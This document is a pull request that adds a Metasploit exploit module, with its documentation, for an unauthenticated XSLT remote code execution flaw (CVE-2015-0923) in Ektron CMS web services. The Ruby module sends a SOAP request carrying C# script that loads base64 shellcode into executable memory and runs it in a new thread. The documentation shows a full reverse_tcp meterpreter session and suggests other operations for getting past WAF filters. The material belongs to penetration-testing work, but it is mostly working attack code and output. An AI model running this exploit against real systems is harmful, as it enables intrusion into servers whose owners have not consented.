### PR TITLE
Ektron Webservices XSLT RCE

### DIFF
--- a/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md
+++ b/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md
@@ -25,7 +25,7 @@
 
   **TARGETOP**
 
-  There are multiple operations which are vulnerable to this XSLT bug. We have enumerated more (likely all) of the operations in ServerControlWS.asmx and provide testers with the ability to test the additional options by setting this option to one of the following: ContentBlockEx, GetContentFlaggingString,GetMessagingString, GetBookmarkString, GetContentRatingString
+  There are multiple operations which are vulnerable to this XSLT bug. We have enumerated more (likely all) of the operations in ServerControlWS.asmx and provide testers with the ability to test the additional operations by setting this option to one of the following: ContentBlockEx, GetContentFlaggingString,GetMessagingString, GetBookmarkString, GetContentRatingString
 
   This value defaults to ContentBlockEx (from the original reports). Testers may find adjusting this value useful if defenders have included Web Application Firewall (WAF) rules to specifically filter ContentBlockEx as a mitigation in lieu of updating.
 

--- a/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md
+++ b/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md
@@ -1,7 +1,3 @@
-The following is the recommended format for module documentation.
-But feel free to add more content/sections to this.
-
-
 ## Vulnerable Application
 
   Ektron Content Management System (CMS) 8.5 and 8.7 before 8.7sp2 and 9.0 before sp1 (according to CVE-2015-0923)

--- a/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md
+++ b/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md
@@ -1,0 +1,74 @@
+The following is the recommended format for module documentation.
+But feel free to add more content/sections to this.
+
+
+## Vulnerable Application
+
+  Ektron Content Management System (CMS) 8.5 and 8.7 before 8.7sp2 and 9.0 before sp1 (according to CVE-2015-0923)
+
+## Verification Steps
+
+  Ektron has been acquired by another company and finding installers may prove difficult. But if you can build a test network the following may be used to verify:
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/http/ektron_xslt_exec_ws```
+  4. Do: ```set RHOST [target ip]```
+  5. Do: ```check```
+  6. You should receive a target vulnerable message.
+  7. Do: ```run```
+  8. You should get a shell.
+
+  In our experience testing against 64 bit hosts should still pass the 'check' in step 6 and return a target vulnerable message. But when injecting shellcode into a new thread it may require the tester to adjust the payload as well. This may be done as follows:
+
+  1. Do ```set PAYLOAD windows/x64/meterpreter```
+
+## Options
+
+  These are important but perhaps less-used options. There are quite a few other 'web' options available which will not be discussed due to their generality.
+
+  **TARGETOP**
+
+  There are multiple operations which are vulnerable to this XSLT bug. We have enumerated more (likely all) of the operations in ServerControlWS.asmx and provide testers with the ability to test the additional options by setting this option to one of the following: ContentBlockEx, GetContentFlaggingString,GetMessagingString, GetBookmarkString, GetContentRatingString
+
+  This value defaults to ContentBlockEx (from the original reports). Testers may find adjusting this value useful if defenders have included Web Application Firewall (WAF) rules to specifically filter ContentBlockEx as a mitigation in lieu of updating.
+
+  **TARGETURI**
+
+  This allows the tester to adjust the base-installation path. The default value is '/cms400min' but in our experience many deployments are simply the root path '/'.
+
+## Scenarios
+
+  Checking if a target is vulnerable.
+
+  ```
+  msf > use exploit/windows/http/ektron_xslt_exec_ws
+  msf exploit(ektron_xslt_exec_ws) > set RHOST 192.168.1.175
+  RHOST => 192.168.1.175
+  msf exploit(ektron_xslt_exec_ws) > check
+  [+] 192.168.1.175:80 The target is vulnerable
+  msf exploit(ektron_xslt_exec_ws) >
+  ```
+
+  Exploiting a Win7 x64 installation to obtain shell.
+
+  ```
+  msf > use exploit/windows/http/ektron_xslt_exec_ws
+  msf exploit(ektron_xslt_exec_ws) > set RHOST 192.168.1.175
+  RHOST => 192.168.1.175
+  msf exploit(ektron_xslt_exec_ws) > check
+  [+] 192.168.1.175:80 The target is vulnerable.
+  msf exploit(ektron_xslt_exec_ws) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+  PAYLOAD => windows/x64/meterpreter/reverse_tcp
+  msf exploit(ektron_xslt_exec_ws) > set LHOST 192.168.1.50
+  LHOST => 192.168.1.50
+  msf exploit(ektron_xslt_exec_ws) > exploit
+  [*] Started reverse TCP handler on 192.168.1.50:4444
+  [*] Generating the EXE Payload and the XSLT...
+  [*] Trying to run the xslt transformation...
+  [+] Exploitation was successful
+  [*] Sending stage (1189423 bytes) to 192.168.1.175
+  [*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.175:49169) at 2016-10-30 04:36:50 +0000
+
+  meterpreter >
+  ```

--- a/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md
+++ b/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md
@@ -1,10 +1,12 @@
 ## Vulnerable Application
 
-  Ektron Content Management System (CMS) 8.5 and 8.7 before 8.7sp2 and 9.0 before sp1 (according to CVE-2015-0923)
+  [Ektron Content Management System (CMS)](http://www.episerver.com/cms/ektron/) 8.0, 8.5, and 8.7 before 8.7sp2 and 9.0 before sp1 (according to CVE-2015-0923)
+
+  Ektron has been acquired by Epi Server and finding installers may prove difficult.
 
 ## Verification Steps
 
-  Ektron has been acquired by another company and finding installers may prove difficult. But if you can build a test network the following may be used to verify:
+   But if you can build a test network the following may be used to verify:
 
   1. Install the application
   2. Start msfconsole
@@ -12,7 +14,7 @@
   4. Do: ```set RHOST [target ip]```
   5. Do: ```check```
   6. You should receive a target vulnerable message.
-  7. Do: ```run```
+  7. Do: ```exploit```
   8. You should get a shell.
 
   In our experience testing against 64 bit hosts should still pass the 'check' in step 6 and return a target vulnerable message. But when injecting shellcode into a new thread it may require the tester to adjust the payload as well. This may be done as follows:

--- a/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
+++ b/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
@@ -14,7 +14,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',
-      'Description'    => %q{
+      'Description'    => %q{ Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have
+vulnerabilities in various operations within the ServerControlWS.asmx
+web services. These vulnerabilities allow for RCE without authentication and
+execute in the context of IIS on the remote system.
       },
       'Author'         => [
         'catatonicprime'

--- a/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
+++ b/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
@@ -4,7 +4,6 @@
 ##
 
 require 'msf/core'
-require 'msf/core/exploit/file_dropper'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -14,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Ektron 8.5, 8.7 < sp2, 9.0 < sp1 XSLT Transform Remote Code Execution',
+      'Name'           => 'Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution',
       'Description'    => %q{
       },
       'Author'         => [
@@ -129,7 +128,7 @@ XSLT
         'headers' => {
           "Referer" => build_referer
         },
-        'data' =>  xslt_data 
+        'data' =>  xslt_data
       })
 
     if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/

--- a/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
+++ b/modules/exploits/windows/http/ektron_xslt_exec_ws.rb
@@ -1,0 +1,211 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/file_dropper'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ektron 8.5, 8.7 < sp2, 9.0 < sp1 XSLT Transform Remote Code Execution',
+      'Description'    => %q{
+      },
+      'Author'         => [
+        'catatonicprime'
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2015-0923' ],
+          [ 'US-CERT-VU', '377644' ],
+          [ 'URL', 'http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/' ]
+        ],
+      'Payload'        =>
+        {
+          'Space'           => 2048,
+          'StackAdjustment' => -3500
+        },
+      'Platform'       => 'win',
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          ['Windows 2008 R2 / Ektron CMS400 8.5', { 'Arch' => [ ARCH_X86_64, ARCH_X86 ] }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Feb 05 2015'
+    ))
+
+    register_options(
+      [
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),
+        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/']),
+        OptEnum.new('TARGETOP',
+          [
+            true,
+            'The vulnerable web service operation to exploit',
+            'ContentBlockEx',
+              [
+                'ContentBlockEx',
+                'GetBookmarkString',
+                'GetContentFlaggingString',
+                'GetContentRatingString',
+                'GetMessagingString'
+              ]
+          ])
+      ], self.class )
+  end
+
+
+  def vulnerable_param
+    return 'Xslt' if datastore['TARGETOP'] == 'ContentBlockEx'
+    'xslt'
+  end
+
+  def required_params
+    return '' if datastore['TARGETOP'] == 'ContentBlockEx'
+    '<showmode/>'
+  end
+
+  def target_operation
+    datastore['TARGETOP']
+  end
+
+  def prologue
+    <<-XSLT
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <#{target_operation} xmlns="http://www.ektron.com/CMS400/Webservice">
+      #{required_params}
+      <#{vulnerable_param}>
+        <![CDATA[
+        <xsl:transform version="2.0"
+          xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+          xmlns:msxsl="urn:schemas-microsoft-com:xslt"
+          xmlns:user="http://mycompany.com/mynamespace">
+          <msxsl:script language="C#" implements-prefix="user">
+XSLT
+  end
+
+  def epilogue
+    <<-XSLT
+          </msxsl:script>
+          <xsl:template match="/">
+            <xsl:value-of select="user:xml()"/>
+          </xsl:template>
+        </xsl:transform>
+        ]]>
+      </#{vulnerable_param}>
+    </#{target_operation}>
+  </soap:Body>
+</soap:Envelope>
+XSLT
+  end
+
+  def check
+
+    fingerprint = rand_text_alpha(5 + rand(5))
+    xslt_data = <<-XSLT
+#{prologue}
+            public string xml() {
+              return "#{fingerprint}";
+            }
+#{epilogue}
+XSLT
+
+    res = send_request_cgi(
+      {
+        'uri'     => "#{uri_path}WorkArea/ServerControlWS.asmx",
+        'version' => '1.1',
+        'method'  => 'POST',
+        'ctype'   => "text/xml; charset=UTF-8",
+        'headers' => {
+          "Referer" => build_referer
+        },
+        'data' =>  xslt_data 
+      })
+
+    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def uri_path
+    uri_path = target_uri.path
+    uri_path << "/" if uri_path[-1, 1] != "/"
+    uri_path
+  end
+
+  def build_referer
+    if datastore['SSL']
+      schema = "https://"
+    else
+      schema = "http://"
+    end
+
+    referer = schema
+    referer << rhost
+    referer << ":#{rport}"
+    referer << uri_path
+    referer
+  end
+
+  def exploit
+
+    print_status("Generating the EXE Payload and the XSLT...")
+    fingerprint = rand_text_alpha(5 + rand(5))
+
+    xslt_data = <<-XSLT
+#{prologue}
+            private static UInt32 MEM_COMMIT = 0x1000;
+            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
+
+            [System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]
+            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
+
+            [System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]
+            private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
+
+            public string xml()
+            {
+              string shellcode64 = @&quot;#{Rex::Text.encode_base64(payload.encoded)}&quot;;
+              byte[] shellcode = System.Convert.FromBase64String(shellcode64);
+              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+              System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
+              IntPtr hThread = IntPtr.Zero;
+              IntPtr pinfo = IntPtr.Zero;
+              UInt32 threadId = 0;
+              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
+              return &quot;#{fingerprint}&quot;;
+            }
+#{epilogue}
+XSLT
+
+    print_status("Trying to run the xslt transformation...")
+    res = send_request_cgi(
+      {
+        'uri'     => "#{uri_path}WorkArea/ServerControlWS.asmx",
+        'version' => '1.1',
+        'method'  => 'POST',
+        'ctype'   => "text/xml; charset=UTF-8",
+        'headers' => {
+          "Referer" => build_referer
+        },
+        'data' => xslt_data
+      })
+    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/
+      print_good("Exploitation was successful")
+    else
+      fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")
+    end
+
+  end
+end


### PR DESCRIPTION
Adds exploit module for CVE-2015-0923. This was originally reported as simply an XXE permitting file disclosure. Additional analysis indicated the possibility of RCE. I've verified this against Ektron 8.02, and 8.5 systems. The original report specifies the XXE (and therefore likely the RCE) to impact several version, including 8.5, 8.7, and 9.0 at various patch levels.

The reported vulnerable web service call is operation 'ContentBlockEx' in the 'Xslt' parameter. I've discovered this vulnerability also impacts 4 additional web service calls in the 'xslt' parameter (note: case sensitive). These additional calls are only effective when the 'showmode' parameter is present, however it does not need to have value.

This leads to the following vulnerable operations (TARGETOP) in the web services ServerControlWS.asmx:
ContentBlockEx
GetBookmarkString
GetContentFlaggingString
GetContentRatingString
GetMessagingString

This module is derived from the existing ektron_xslt_exec module. However these appear to be different vectors and different vulns.

I have checked this on Ektron 8.0/8.01, still working on verifying later installations (though according to the report they still expose these vulnerable web services).
## Verification

After deploying a vulnerable service, you may check basic installations with the following:
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/ektron_xslt_exec_ws`
- [ ] `set RHOST ...`
- [ ] `check`
- [ ] **Verify** known vulnerable service returns as being vulnerable. 
- [ ] `exploit`
- [ ] **Verify** session is returned
